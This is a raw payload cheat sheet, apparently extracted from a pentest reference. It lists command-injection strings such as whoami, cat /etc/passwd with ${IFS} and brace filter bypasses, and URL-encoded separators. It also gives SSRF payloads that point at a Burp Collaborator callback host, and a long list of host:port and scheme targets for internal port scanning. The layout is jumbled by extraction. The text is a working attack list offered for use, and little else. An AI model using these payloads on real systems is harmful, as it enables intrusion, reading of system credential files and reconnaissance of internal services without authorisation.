|| who$()ami ||
& who$(echo+am)i &
| whoècho+amì |
%3B %3B
%26%26 %26%26
%7C%7C %7C%7C
%26 %26
%7C %7C
%253B %253B
%2526%2526 %2526%2526
%257C%257C cat${IFS}/etc/passwd %257C%257C
%2526 ls${IFS}-la %2526
%257C {cat,/etc/passwd} %257C
cat</etc/passwd
`whoami`
$(whoami)
sleep(15)
Server-Side Request Forgery
1 - HTTP OR DNS Interaction

BURPCollaborator
@BURPCollaborator
:@BURPCollaborator
http://BURPCollaborator
https://BURPCollaborator
DOMAIN@BURPCollaborator
http://DOMAIN@BURPCollaborator
https://DOMAIN@BURPCollaborator
BURPCollaborator?DOMAIN /
http://BURPCollaborator?DOMAIN %2f
https://BURPCollaborator?DOMAIN %252f
BURPCollaborator%3FDOMAIN
http://BURPCollaborator%3FDOMAIN
#
https://BURPCollaborator%3FDOMAIN %23
BURPCollaborator%253FDOMAIN %2523
http://BURPCollaborator%253FDOMAIN
https://BURPCollaborator%253FDOMAIN
DOMAIN:@BURPCollaborator
http://DOMAIN:@BURPCollaborator
https://DOMAIN:@BURPCollaborator
DOMAIN: BURPCollaborator
http://DOMAIN: BURPCollaborator
https://DOMAIN: BURPCollaborator
BURPCollaborator DOMAIN
http://BURPCollaborator DOMAIN
https://BURPCollaborator DOMAIN
Server-Side Request Forgery
2 - Whitelist Subdomains Port Scanning

SUB.ROOT.TLD:80 SUB.ROOT.TLD:7000 SUB.ROOT.TLD:8854

SUB.ROOT.TLD:9018 SUB.ROOT.TLD:5080
SUB.ROOT.TLD:443 SUB.ROOT.TLD:85 SUB.ROOT.TLD:8409
SUB.ROOT.TLD:8026 SUB.ROOT.TLD:8036
SUB.ROOT.TLD:7547 SUB.ROOT.TLD:6379 SUB.ROOT.TLD:8412
SUB.ROOT.TLD:9207 SUB.ROOT.TLD:5050
SUB.ROOT.TLD:8080 SUB.ROOT.TLD:7676 SUB.ROOT.TLD:8969
SUB.ROOT.TLD:9898 SUB.ROOT.TLD:8442
SUB.ROOT.TLD:8089 SUB.ROOT.TLD:3689 SUB.ROOT.TLD:8422
SUB.ROOT.TLD:9208 SUB.ROOT.TLD:8027
SUB.ROOT.TLD:4567 SUB.ROOT.TLD:12000 SUB.ROOT.TLD:6262
SUB.ROOT.TLD:9220 SUB.ROOT.TLD:9899
SUB.ROOT.TLD:8008 SUB.ROOT.TLD:800 SUB.ROOT.TLD:8830
SUB.ROOT.TLD:2200 SUB.ROOT.TLD:111
SUB.ROOT.TLD:8443 SUB.ROOT.TLD:51235 SUB.ROOT.TLD:8867
SUB.ROOT.TLD:1023 SUB.ROOT.TLD:13
SUB.ROOT.TLD:8081 SUB.ROOT.TLD:4899 SUB.ROOT.TLD:8414
SUB.ROOT.TLD:9214 SUB.ROOT.TLD:465
SUB.ROOT.TLD:2087 SUB.ROOT.TLD:1723 SUB.ROOT.TLD:8870
SUB.ROOT.TLD:2067 SUB.ROOT.TLD:3120
SUB.ROOT.TLD:2083 SUB.ROOT.TLD:666 SUB.ROOT.TLD:8845
SUB.ROOT.TLD:9093 SUB.ROOT.TLD:6036
SUB.ROOT.TLD:2082 SUB.ROOT.TLD:3333 SUB.ROOT.TLD:8427
SUB.ROOT.TLD:9209 SUB.ROOT.TLD:15
SUB.ROOT.TLD:5985 SUB.ROOT.TLD:5858 SUB.ROOT.TLD:8824
SUB.ROOT.TLD:6006 SUB.ROOT.TLD:8184
SUB.ROOT.TLD:2086 SUB.ROOT.TLD:8084 SUB.ROOT.TLD:8879
SUB.ROOT.TLD:6005 SUB.ROOT.TLD:3443
SUB.ROOT.TLD:1024 SUB.ROOT.TLD:5801 SUB.ROOT.TLD:8407
SUB.ROOT.TLD:9027 SUB.ROOT.TLD:7654
SUB.ROOT.TLD:8888 SUB.ROOT.TLD:5901 SUB.ROOT.TLD:8865
SUB.ROOT.TLD:9084 SUB.ROOT.TLD:8035
SUB.ROOT.TLD:8000 SUB.ROOT.TLD:6264 SUB.ROOT.TLD:8875
SUB.ROOT.TLD:143 SUB.ROOT.TLD:8034
SUB.ROOT.TLD:8880 SUB.ROOT.TLD:5560 SUB.ROOT.TLD:8826
SUB.ROOT.TLD:789 SUB.ROOT.TLD:7465
SUB.ROOT.TLD:9080 SUB.ROOT.TLD:5577 SUB.ROOT.TLD:8814
SUB.ROOT.TLD:9012 SUB.ROOT.TLD:8812
SUB.ROOT.TLD:81 SUB.ROOT.TLD:9444 SUB.ROOT.TLD:8426
SUB.ROOT.TLD:9088 SUB.ROOT.TLD:3460
SUB.ROOT.TLD:5000 SUB.ROOT.TLD:37215 SUB.ROOT.TLD:8413
SUB.ROOT.TLD:5002 SUB.ROOT.TLD:6565
SUB.ROOT.TLD:49152 SUB.ROOT.TLD:8003 SUB.ROOT.TLD:8861
SUB.ROOT.TLD:9550 SUB.ROOT.TLD:37
SUB.ROOT.TLD:9000 SUB.ROOT.TLD:8999 SUB.ROOT.TLD:8836
SUB.ROOT.TLD:9111 SUB.ROOT.TLD:8103
SUB.ROOT.TLD:8085 SUB.ROOT.TLD:4242 SUB.ROOT.TLD:8767
SUB.ROOT.TLD:9988 SUB.ROOT.TLD:17
SUB.ROOT.TLD:7170 SUB.ROOT.TLD:5984 SUB.ROOT.TLD:6560
SUB.ROOT.TLD:2150 SUB.ROOT.TLD:100
SUB.ROOT.TLD:5001 SUB.ROOT.TLD:5172 SUB.ROOT.TLD:8842
SUB.ROOT.TLD:8881 SUB.ROOT.TLD:8118
SUB.ROOT.TLD:3128 SUB.ROOT.TLD:4282 SUB.ROOT.TLD:6650
SUB.ROOT.TLD:9047 SUB.ROOT.TLD:1599
SUB.ROOT.TLD:8001 SUB.ROOT.TLD:1311 SUB.ROOT.TLD:8841
SUB.ROOT.TLD:9955 SUB.ROOT.TLD:9433
SUB.ROOT.TLD:8090 SUB.ROOT.TLD:90 SUB.ROOT.TLD:8874
SUB.ROOT.TLD:9034 SUB.ROOT.TLD:92
SUB.ROOT.TLD:9999 SUB.ROOT.TLD:9003 SUB.ROOT.TLD:8862
SUB.ROOT.TLD:9016 SUB.ROOT.TLD:6601
SUB.ROOT.TLD:10443 SUB.ROOT.TLD:1200 SUB.ROOT.TLD:8832
SUB.ROOT.TLD:9098 SUB.ROOT.TLD:9950
SUB.ROOT.TLD:9090 SUB.ROOT.TLD:2081 SUB.ROOT.TLD:6561
SUB.ROOT.TLD:9046 SUB.ROOT.TLD:7778
SUB.ROOT.TLD:8083 SUB.ROOT.TLD:5269 SUB.ROOT.TLD:8782
SUB.ROOT.TLD:6008 SUB.ROOT.TLD:8110
SUB.ROOT.TLD:5357 SUB.ROOT.TLD:7081 SUB.ROOT.TLD:8784
SUB.ROOT.TLD:9119 SUB.ROOT.TLD:175
SUB.ROOT.TLD:3000 SUB.ROOT.TLD:8091 SUB.ROOT.TLD:8840
SUB.ROOT.TLD:9017 SUB.ROOT.TLD:8024
SUB.ROOT.TLD:9100 SUB.ROOT.TLD:2323 SUB.ROOT.TLD:8871
SUB.ROOT.TLD:70 SUB.ROOT.TLD:6503
SUB.ROOT.TLD:52869 SUB.ROOT.TLD:2002 SUB.ROOT.TLD:8791
SUB.ROOT.TLD:8019 SUB.ROOT.TLD:8038
SUB.ROOT.TLD:9306 SUB.ROOT.TLD:13579 SUB.ROOT.TLD:8825
SUB.ROOT.TLD:9300 SUB.ROOT.TLD:8813
SUB.ROOT.TLD:82 SUB.ROOT.TLD:4321 SUB.ROOT.TLD:8869
SUB.ROOT.TLD:8042 SUB.ROOT.TLD:19
SUB.ROOT.TLD:88 SUB.ROOT.TLD:3542 SUB.ROOT.TLD:8829
SUB.ROOT.TLD:9251 SUB.ROOT.TLD:7979
SUB.ROOT.TLD:8010 SUB.ROOT.TLD:3541 SUB.ROOT.TLD:8621
SUB.ROOT.TLD:7090 SUB.ROOT.TLD:8815
SUB.ROOT.TLD:4443 SUB.ROOT.TLD:3780 SUB.ROOT.TLD:8873
SUB.ROOT.TLD:311 SUB.ROOT.TLD:8104
SUB.ROOT.TLD:7443 SUB.ROOT.TLD:3749 SUB.ROOT.TLD:8622
SUB.ROOT.TLD:1099 SUB.ROOT.TLD:8066
SUB.ROOT.TLD:9443 SUB.ROOT.TLD:4664 SUB.ROOT.TLD:8839
SUB.ROOT.TLD:8448 SUB.ROOT.TLD:8405
SUB.ROOT.TLD:10000 SUB.ROOT.TLD:3306 SUB.ROOT.TLD:8853
SUB.ROOT.TLD:9044 SUB.ROOT.TLD:8055
SUB.ROOT.TLD:8181 SUB.ROOT.TLD:4782 SUB.ROOT.TLD:8817
SUB.ROOT.TLD:9876 SUB.ROOT.TLD:1027
SUB.ROOT.TLD:9001 SUB.ROOT.TLD:4949 SUB.ROOT.TLD:8856
SUB.ROOT.TLD:8017 SUB.ROOT.TLD:8816
SUB.ROOT.TLD:6443 SUB.ROOT.TLD:11300 SUB.ROOT.TLD:8847
SUB.ROOT.TLD:8097 SUB.ROOT.TLD:3479
SUB.ROOT.TLD:444 SUB.ROOT.TLD:8006 SUB.ROOT.TLD:8828
SUB.ROOT.TLD:4100 SUB.ROOT.TLD:8844
SUB.ROOT.TLD:8086 SUB.ROOT.TLD:5938 SUB.ROOT.TLD:8872
SUB.ROOT.TLD:44818 SUB.ROOT.TLD:8935
SUB.ROOT.TLD:2096 SUB.ROOT.TLD:11211 SUB.ROOT.TLD:8831
SUB.ROOT.TLD:6588 SUB.ROOT.TLD:8819
SUB.ROOT.TLD:7777 SUB.ROOT.TLD:4840 SUB.ROOT.TLD:8876
SUB.ROOT.TLD:119 SUB.ROOT.TLD:8105
SUB.ROOT.TLD:10001 SUB.ROOT.TLD:8383 SUB.ROOT.TLD:8837
SUB.ROOT.TLD:2111 SUB.ROOT.TLD:8700
SUB.ROOT.TLD:8200 SUB.ROOT.TLD:4063 SUB.ROOT.TLD:8623
SUB.ROOT.TLD:9202 SUB.ROOT.TLD:6748
SUB.ROOT.TLD:2095 SUB.ROOT.TLD:3310 SUB.ROOT.TLD:8835
SUB.ROOT.TLD:9199 SUB.ROOT.TLD:8802
SUB.ROOT.TLD:8009 SUB.ROOT.TLD:9101 SUB.ROOT.TLD:8637
SUB.ROOT.TLD:9966 SUB.ROOT.TLD:8041
SUB.ROOT.TLD:9002 SUB.ROOT.TLD:11112 SUB.ROOT.TLD:3101
SUB.ROOT.TLD:1080 SUB.ROOT.TLD:6955
SUB.ROOT.TLD:8800 SUB.ROOT.TLD:4506 SUB.ROOT.TLD:3121
SUB.ROOT.TLD:1741 SUB.ROOT.TLD:2020
SUB.ROOT.TLD:6000 SUB.ROOT.TLD:8011 SUB.ROOT.TLD:1515
SUB.ROOT.TLD:9050 SUB.ROOT.TLD:4445
SUB.ROOT.TLD:9009 SUB.ROOT.TLD:1400 SUB.ROOT.TLD:447
SUB.ROOT.TLD:8848 SUB.ROOT.TLD:8108
SUB.ROOT.TLD:9200 SUB.ROOT.TLD:8899 SUB.ROOT.TLD:5280
SUB.ROOT.TLD:8031 SUB.ROOT.TLD:8052
SUB.ROOT.TLD:5005 SUB.ROOT.TLD:8004 SUB.ROOT.TLD:3112
SUB.ROOT.TLD:8033 SUB.ROOT.TLD:8222
SUB.ROOT.TLD:83 SUB.ROOT.TLD:7005 SUB.ROOT.TLD:3114
SUB.ROOT.TLD:1471 SUB.ROOT.TLD:7444
SUB.ROOT.TLD:3001 SUB.ROOT.TLD:21025 SUB.ROOT.TLD:3103
SUB.ROOT.TLD:9189 SUB.ROOT.TLD:8107
SUB.ROOT.TLD:5555 SUB.ROOT.TLD:4786 SUB.ROOT.TLD:3108
SUB.ROOT.TLD:9104 SUB.ROOT.TLD:5500
SUB.ROOT.TLD:32400 SUB.ROOT.TLD:4433 SUB.ROOT.TLD:3102
SUB.ROOT.TLD:8190 SUB.ROOT.TLD:7700
SUB.ROOT.TLD:1900 SUB.ROOT.TLD:4369 SUB.ROOT.TLD:3105
SUB.ROOT.TLD:9030 SUB.ROOT.TLD:5003
SUB.ROOT.TLD:6001 SUB.ROOT.TLD:16992 SUB.ROOT.TLD:3110
SUB.ROOT.TLD:4117 SUB.ROOT.TLD:8053
SUB.ROOT.TLD:8099 SUB.ROOT.TLD:5431 SUB.ROOT.TLD:3107
SUB.ROOT.TLD:1000 SUB.ROOT.TLD:5090
SUB.ROOT.TLD:8889 SUB.ROOT.TLD:16010 SUB.ROOT.TLD:3109
SUB.ROOT.TLD:9445 SUB.ROOT.TLD:8047
SUB.ROOT.TLD:7001 SUB.ROOT.TLD:25001 SUB.ROOT.TLD:3113

http://
SUB.ROOT.TLD:9301 SUB.ROOT.TLD:8045
SUB.ROOT.TLD:50000 SUB.ROOT.TLD:3388 SUB.ROOT.TLD:2030
SUB.ROOT.TLD:6004 SUB.ROOT.TLD:8109
SUB.ROOT.TLD:9998 SUB.ROOT.TLD:23424 SUB.ROOT.TLD:3116
SUB.ROOT.TLD:8401 SUB.ROOT.TLD:8779
SUB.ROOT.TLD:5006 SUB.ROOT.TLD:8005 SUB.ROOT.TLD:3117
SUB.ROOT.TLD:8553 SUB.ROOT.TLD:8804

/
SUB.ROOT.TLD:5986 SUB.ROOT.TLD:102 SUB.ROOT.TLD:3118
https:// SUB.ROOT.TLD:20000
SUB.ROOT.TLD:8123
SUB.ROOT.TLD:8060
SUB.ROOT.TLD:8989
SUB.ROOT.TLD:16993
SUB.ROOT.TLD:9013
SUB.ROOT.TLD:9040
SUB.ROOT.TLD:9990
SUB.ROOT.TLD:8106
SUB.ROOT.TLD:6662
SUB.ROOT.TLD:7998
SUB.ROOT.TLD:4001
SUB.ROOT.TLD:2080
SUB.ROOT.TLD:3115
SUB.ROOT.TLD:3104
SUB.ROOT.TLD:8686 SUB.ROOT.TLD:8049

ssh:// SUB.ROOT.TLD:2222
SUB.ROOT.TLD:84
SUB.ROOT.TLD:8069
SUB.ROOT.TLD:8554
SUB.ROOT.TLD:14147
SUB.ROOT.TLD:8096
SUB.ROOT.TLD:9222
SUB.ROOT.TLD:9033
SUB.ROOT.TLD:8056
SUB.ROOT.TLD:8877
SUB.ROOT.TLD:3106
SUB.ROOT.TLD:5605
SUB.ROOT.TLD:3119

%2f
SUB.ROOT.TLD:8032 SUB.ROOT.TLD:22222
SUB.ROOT.TLD:12345 SUB.ROOT.TLD:8012 SUB.ROOT.TLD:23

pop3://
SUB.ROOT.TLD:9221 SUB.ROOT.TLD:8891
SUB.ROOT.TLD:888 SUB.ROOT.TLD:1883 SUB.ROOT.TLD:5606
SUB.ROOT.TLD:8585 SUB.ROOT.TLD:4010
SUB.ROOT.TLD:10250 SUB.ROOT.TLD:9004 SUB.ROOT.TLD:96
SUB.ROOT.TLD:9311 SUB.ROOT.TLD:8044
SUB.ROOT.TLD:7548 SUB.ROOT.TLD:8015 SUB.ROOT.TLD:5595
SUB.ROOT.TLD:993 SUB.ROOT.TLD:8054
SUB.ROOT.TLD:631 SUB.ROOT.TLD:2375 SUB.ROOT.TLD:5446
ftp:// SUB.ROOT.TLD:8098 SUB.ROOT.TLD:808
SUB.ROOT.TLD:104
SUB.ROOT.TLD:2122
SUB.ROOT.TLD:8805
SUB.ROOT.TLD:8243
SUB.ROOT.TLD:5596

%252f
SUB.ROOT.TLD:5222 SUB.ROOT.TLD:8043 SUB.ROOT.TLD:1290
SUB.ROOT.TLD:1153 SUB.ROOT.TLD:8820
SUB.ROOT.TLD:2000 SUB.ROOT.TLD:3260 SUB.ROOT.TLD:60129
SUB.ROOT.TLD:2126 SUB.ROOT.TLD:1050

sftp:// SUB.ROOT.TLD:8112
SUB.ROOT.TLD:8087
SUB.ROOT.TLD:7171
SUB.ROOT.TLD:2008
SUB.ROOT.TLD:21379
SUB.ROOT.TLD:35000
SUB.ROOT.TLD:902
SUB.ROOT.TLD:1604
SUB.ROOT.TLD:6789
SUB.ROOT.TLD:3111
SUB.ROOT.TLD:8057
SUB.ROOT.TLD:6308
SUB.ROOT.TLD:5906
SUB.ROOT.TLD:1111
SUB.ROOT.TLD:97
SUB.ROOT.TLD:5010 SUB.ROOT.TLD:9005 SUB.ROOT.TLD:448

tftp://
SUB.ROOT.TLD:9992 SUB.ROOT.TLD:8046

#
SUB.ROOT.TLD:2077 SUB.ROOT.TLD:25105 SUB.ROOT.TLD:5569
SUB.ROOT.TLD:9203 SUB.ROOT.TLD:8666
SUB.ROOT.TLD:8126 SUB.ROOT.TLD:4430 SUB.ROOT.TLD:4999
SUB.ROOT.TLD:8801 SUB.ROOT.TLD:7493
SUB.ROOT.TLD:7779 SUB.ROOT.TLD:9102 SUB.ROOT.TLD:2003
SUB.ROOT.TLD:9204 SUB.ROOT.TLD:8859
SUB.ROOT.TLD:7071 SUB.ROOT.TLD:7070 SUB.ROOT.TLD:685
gopher:// SUB.ROOT.TLD:5601
SUB.ROOT.TLD:8139
SUB.ROOT.TLD:3389
SUB.ROOT.TLD:8180
SUB.ROOT.TLD:2376
SUB.ROOT.TLD:2455
SUB.ROOT.TLD:503
SUB.ROOT.TLD:8885
SUB.ROOT.TLD:9029
SUB.ROOT.TLD:43
SUB.ROOT.TLD:8803
SUB.ROOT.TLD:843
SUB.ROOT.TLD:3910
SUB.ROOT.TLD:2021
SUB.ROOT.TLD:880

%23
SUB.ROOT.TLD:9024 SUB.ROOT.TLD:7433

ldap:// SUB.ROOT.TLD:8834
SUB.ROOT.TLD:4040
SUB.ROOT.TLD:5007
SUB.ROOT.TLD:8445
SUB.ROOT.TLD:7002
SUB.ROOT.TLD:20256
SUB.ROOT.TLD:8040
SUB.ROOT.TLD:9216
SUB.ROOT.TLD:992
SUB.ROOT.TLD:8733
SUB.ROOT.TLD:8429
SUB.ROOT.TLD:8037
SUB.ROOT.TLD:4002
SUB.ROOT.TLD:5600
SUB.ROOT.TLD:26
SUB.ROOT.TLD:9943 SUB.ROOT.TLD:25565 SUB.ROOT.TLD:994

dict://
SUB.ROOT.TLD:8028 SUB.ROOT.TLD:8403
SUB.ROOT.TLD:9191 SUB.ROOT.TLD:2404 SUB.ROOT.TLD:4343
SUB.ROOT.TLD:8048 SUB.ROOT.TLD:7401
SUB.ROOT.TLD:5009 SUB.ROOT.TLD:9037 SUB.ROOT.TLD:2233
SUB.ROOT.TLD:21 SUB.ROOT.TLD:8143

%2523
SUB.ROOT.TLD:1935 SUB.ROOT.TLD:28017 SUB.ROOT.TLD:4523
SUB.ROOT.TLD:9025 SUB.ROOT.TLD:7887
SUB.ROOT.TLD:5900 SUB.ROOT.TLD:8014 SUB.ROOT.TLD:5568
smtp:// SUB.ROOT.TLD:8082
SUB.ROOT.TLD:8020
SUB.ROOT.TLD:9295
SUB.ROOT.TLD:7010
SUB.ROOT.TLD:8016
SUB.ROOT.TLD:9089
SUB.ROOT.TLD:9217
SUB.ROOT.TLD:8029
SUB.ROOT.TLD:6605
SUB.ROOT.TLD:7537
SUB.ROOT.TLD:6161
SUB.ROOT.TLD:8420
SUB.ROOT.TLD:1028
SUB.ROOT.TLD:5150
SUB.ROOT.TLD:5201
SUB.ROOT.TLD:9389 SUB.ROOT.TLD:8810

scp:// SUB.ROOT.TLD:4848
SUB.ROOT.TLD:2480
SUB.ROOT.TLD:4500
SUB.ROOT.TLD:4064
SUB.ROOT.TLD:20547
SUB.ROOT.TLD:8092
SUB.ROOT.TLD:9299
SUB.ROOT.TLD:9682
SUB.ROOT.TLD:9218
SUB.ROOT.TLD:87
SUB.ROOT.TLD:801
SUB.ROOT.TLD:6622
SUB.ROOT.TLD:4200
SUB.ROOT.TLD:180
SUB.ROOT.TLD:4545
SUB.ROOT.TLD:5672 SUB.ROOT.TLD:37777 SUB.ROOT.TLD:3838
SUB.ROOT.TLD:9031 SUB.ROOT.TLD:8039
SUB.ROOT.TLD:8140 SUB.ROOT.TLD:2379 SUB.ROOT.TLD:5597
SUB.ROOT.TLD:9219 SUB.ROOT.TLD:8857
SUB.ROOT.TLD:2079 SUB.ROOT.TLD:52881 SUB.ROOT.TLD:2320
SUB.ROOT.TLD:9690 SUB.ROOT.TLD:8411
SUB.ROOT.TLD:554 SUB.ROOT.TLD:9010 SUB.ROOT.TLD:5607
SUB.ROOT.TLD:9108 SUB.ROOT.TLD:8237
SUB.ROOT.TLD:2345 SUB.ROOT.TLD:27017 SUB.ROOT.TLD:2001
SUB.ROOT.TLD:9606 SUB.ROOT.TLD:2048
SUB.ROOT.TLD:3299 SUB.ROOT.TLD:8100 SUB.ROOT.TLD:2232
SUB.ROOT.TLD:9019 SUB.ROOT.TLD:6600
SUB.ROOT.TLD:1433 SUB.ROOT.TLD:8021 SUB.ROOT.TLD:2010
SUB.ROOT.TLD:9110 SUB.ROOT.TLD:99
SUB.ROOT.TLD:1521 SUB.ROOT.TLD:8022 SUB.ROOT.TLD:5907
SUB.ROOT.TLD:9026 SUB.ROOT.TLD:8249
SUB.ROOT.TLD:6666 SUB.ROOT.TLD:2332 SUB.ROOT.TLD:2012
SUB.ROOT.TLD:9861 SUB.ROOT.TLD:8868
SUB.ROOT.TLD:49153 SUB.ROOT.TLD:9099 SUB.ROOT.TLD:5070
SUB.ROOT.TLD:6007 SUB.ROOT.TLD:555
SUB.ROOT.TLD:389 SUB.ROOT.TLD:9211 SUB.ROOT.TLD:5599
SUB.ROOT.TLD:9048 SUB.ROOT.TLD:6603
SUB.ROOT.TLD:587 SUB.ROOT.TLD:110 SUB.ROOT.TLD:3337
SUB.ROOT.TLD:8051 SUB.ROOT.TLD:1947
SUB.ROOT.TLD:1177 SUB.ROOT.TLD:8282 SUB.ROOT.TLD:62078
SUB.ROOT.TLD:8447 SUB.ROOT.TLD:6543
SUB.ROOT.TLD:9600 SUB.ROOT.TLD:9212 SUB.ROOT.TLD:4118
SUB.ROOT.TLD:9028 SUB.ROOT.TLD:6887
SUB.ROOT.TLD:1025 SUB.ROOT.TLD:32764 SUB.ROOT.TLD:4505
SUB.ROOT.TLD:9704 SUB.ROOT.TLD:8806
SUB.ROOT.TLD:9092 SUB.ROOT.TLD:9213 SUB.ROOT.TLD:5454
SUB.ROOT.TLD:9043 SUB.ROOT.TLD:8988
SUB.ROOT.TLD:2053 SUB.ROOT.TLD:7003 SUB.ROOT.TLD:2259
SUB.ROOT.TLD:8866 SUB.ROOT.TLD:8850
SUB.ROOT.TLD:25 SUB.ROOT.TLD:8093 SUB.ROOT.TLD:5602
SUB.ROOT.TLD:9743 SUB.ROOT.TLD:3200
SUB.ROOT.TLD:9944 SUB.ROOT.TLD:3129 SUB.ROOT.TLD:5542
SUB.ROOT.TLD:9765 SUB.ROOT.TLD:8513
SUB.ROOT.TLD:9761 SUB.ROOT.TLD:7014 SUB.ROOT.TLD:5598
SUB.ROOT.TLD:771 SUB.ROOT.TLD:5004
SUB.ROOT.TLD:2052 SUB.ROOT.TLD:18245 SUB.ROOT.TLD:5609
SUB.ROOT.TLD:9022 SUB.ROOT.TLD:8251
SUB.ROOT.TLD:3790 SUB.ROOT.TLD:89 SUB.ROOT.TLD:2031
SUB.ROOT.TLD:8072 SUB.ROOT.TLD:8833
SUB.ROOT.TLD:4911 SUB.ROOT.TLD:2761 SUB.ROOT.TLD:5592
SUB.ROOT.TLD:8058 SUB.ROOT.TLD:8823
SUB.ROOT.TLD:9051 SUB.ROOT.TLD:8013 SUB.ROOT.TLD:5122
SUB.ROOT.TLD:8094 SUB.ROOT.TLD:8433
SUB.ROOT.TLD:8088 SUB.ROOT.TLD:1026 SUB.ROOT.TLD:5603
SUB.ROOT.TLD:6010 SUB.ROOT.TLD:8590
SUB.ROOT.TLD:9151 SUB.ROOT.TLD:9663 SUB.ROOT.TLD:5190
SUB.ROOT.TLD:79 SUB.ROOT.TLD:8822
SUB.ROOT.TLD:2121 SUB.ROOT.TLD:2762 SUB.ROOT.TLD:5591
SUB.ROOT.TLD:9041 SUB.ROOT.TLD:4730
SUB.ROOT.TLD:9160 SUB.ROOT.TLD:7004 SUB.ROOT.TLD:5593
SUB.ROOT.TLD:7500 SUB.ROOT.TLD:8586
SUB.ROOT.TLD:2181 SUB.ROOT.TLD:7999 SUB.ROOT.TLD:5209
SUB.ROOT.TLD:9045 SUB.ROOT.TLD:8846
SUB.ROOT.TLD:9869 SUB.ROOT.TLD:9527 SUB.ROOT.TLD:3311
SUB.ROOT.TLD:9032 SUB.ROOT.TLD:6102
SUB.ROOT.TLD:9981 SUB.ROOT.TLD:33060 SUB.ROOT.TLD:5590
SUB.ROOT.TLD:9039 SUB.ROOT.TLD:8252
SUB.ROOT.TLD:9530 SUB.ROOT.TLD:8101 SUB.ROOT.TLD:5822
SUB.ROOT.TLD:9500 SUB.ROOT.TLD:6580
SUB.ROOT.TLD:636 SUB.ROOT.TLD:8843 SUB.ROOT.TLD:3690
SUB.ROOT.TLD:9106 SUB.ROOT.TLD:8863
SUB.ROOT.TLD:60001 SUB.ROOT.TLD:9006 SUB.ROOT.TLD:5494
SUB.ROOT.TLD:548 SUB.ROOT.TLD:8688
SUB.ROOT.TLD:9042 SUB.ROOT.TLD:9201 SUB.ROOT.TLD:53
SUB.ROOT.TLD:8111 SUB.ROOT.TLD:8402
SUB.ROOT.TLD:10243 SUB.ROOT.TLD:9082 SUB.ROOT.TLD:5594
SUB.ROOT.TLD:9107 SUB.ROOT.TLD:8248
SUB.ROOT.TLD:9633 SUB.ROOT.TLD:9011 SUB.ROOT.TLD:5909
SUB.ROOT.TLD:9206 SUB.ROOT.TLD:3002
SUB.ROOT.TLD:9595 SUB.ROOT.TLD:8182 SUB.ROOT.TLD:5604
SUB.ROOT.TLD:9038 SUB.ROOT.TLD:8860
SUB.ROOT.TLD:9418 SUB.ROOT.TLD:9008 SUB.ROOT.TLD:5673
SUB.ROOT.TLD:8071 SUB.ROOT.TLD:8431
SUB.ROOT.TLD:8334 SUB.ROOT.TLD:8025 SUB.ROOT.TLD:3950
SUB.ROOT.TLD:8849 SUB.ROOT.TLD:8241
SUB.ROOT.TLD:18081 SUB.ROOT.TLD:9094 SUB.ROOT.TLD:5910
SUB.ROOT.TLD:502 SUB.ROOT.TLD:6464
SUB.ROOT.TLD:7415 SUB.ROOT.TLD:9997 SUB.ROOT.TLD:3550
SUB.ROOT.TLD:91 SUB.ROOT.TLD:8236
SUB.ROOT.TLD:8333 SUB.ROOT.TLD:5443 SUB.ROOT.TLD:5608
SUB.ROOT.TLD:10134 SUB.ROOT.TLD:8790
SUB.ROOT.TLD:55442 SUB.ROOT.TLD:9021 SUB.ROOT.TLD:5853
SUB.ROOT.TLD:9049 SUB.ROOT.TLD:8858
SUB.ROOT.TLD:8500 SUB.ROOT.TLD:8007 SUB.ROOT.TLD:5908
SUB.ROOT.TLD:6009 SUB.ROOT.TLD:22
SUB.ROOT.TLD:8159 SUB.ROOT.TLD:8050 SUB.ROOT.TLD:5321
SUB.ROOT.TLD:7776 SUB.ROOT.TLD:8807
SUB.ROOT.TLD:7474 SUB.ROOT.TLD:9105 SUB.ROOT.TLD:2050
SUB.ROOT.TLD:7445 SUB.ROOT.TLD:8864
SUB.ROOT.TLD:5432 SUB.ROOT.TLD:8787 SUB.ROOT.TLD:3568
SUB.ROOT.TLD:113 SUB.ROOT.TLD:6511
SUB.ROOT.TLD:8991 SUB.ROOT.TLD:995 SUB.ROOT.TLD:3951
SUB.ROOT.TLD:7510 SUB.ROOT.TLD:8855
SUB.ROOT.TLD:9302 SUB.ROOT.TLD:9036 SUB.ROOT.TLD:1110
SUB.ROOT.TLD:8789 SUB.ROOT.TLD:8238
SUB.ROOT.TLD:17000 SUB.ROOT.TLD:9103 SUB.ROOT.TLD:3555
SUB.ROOT.TLD:264 SUB.ROOT.TLD:2443
SUB.ROOT.TLD:2154 SUB.ROOT.TLD:9095 SUB.ROOT.TLD:98
SUB.ROOT.TLD:515 SUB.ROOT.TLD:6510
SUB.ROOT.TLD:7989 SUB.ROOT.TLD:9035 SUB.ROOT.TLD:3952
SUB.ROOT.TLD:873 SUB.ROOT.TLD:8878
SUB.ROOT.TLD:9305 SUB.ROOT.TLD:9020 SUB.ROOT.TLD:3570
SUB.ROOT.TLD:9991 SUB.ROOT.TLD:5567
SUB.ROOT.TLD:9304 SUB.ROOT.TLD:41800 SUB.ROOT.TLD:3548
SUB.ROOT.TLD:8446 SUB.ROOT.TLD:6581
SUB.ROOT.TLD:9303 SUB.ROOT.TLD:221 SUB.ROOT.TLD:3566
SUB.ROOT.TLD:9136 SUB.ROOT.TLD:8993
SUB.ROOT.TLD:9307 SUB.ROOT.TLD:8663 SUB.ROOT.TLD:3567
SUB.ROOT.TLD:8602 SUB.ROOT.TLD:8410
SUB.ROOT.TLD:7657 SUB.ROOT.TLD:8887 SUB.ROOT.TLD:3793
SUB.ROOT.TLD:8102 SUB.ROOT.TLD:8239
SUB.ROOT.TLD:7218 SUB.ROOT.TLD:5400 SUB.ROOT.TLD:3953
SUB.ROOT.TLD:135 SUB.ROOT.TLD:8417
SUB.ROOT.TLD:55443 SUB.ROOT.TLD:9215 SUB.ROOT.TLD:3552
SUB.ROOT.TLD:1962 SUB.ROOT.TLD:8430
SUB.ROOT.TLD:8291 SUB.ROOT.TLD:6080 SUB.ROOT.TLD:4043
SUB.ROOT.TLD:8404 SUB.ROOT.TLD:6998
SUB.ROOT.TLD:11000 SUB.ROOT.TLD:9023 SUB.ROOT.TLD:3524
SUB.ROOT.TLD:3100 SUB.ROOT.TLD:8809
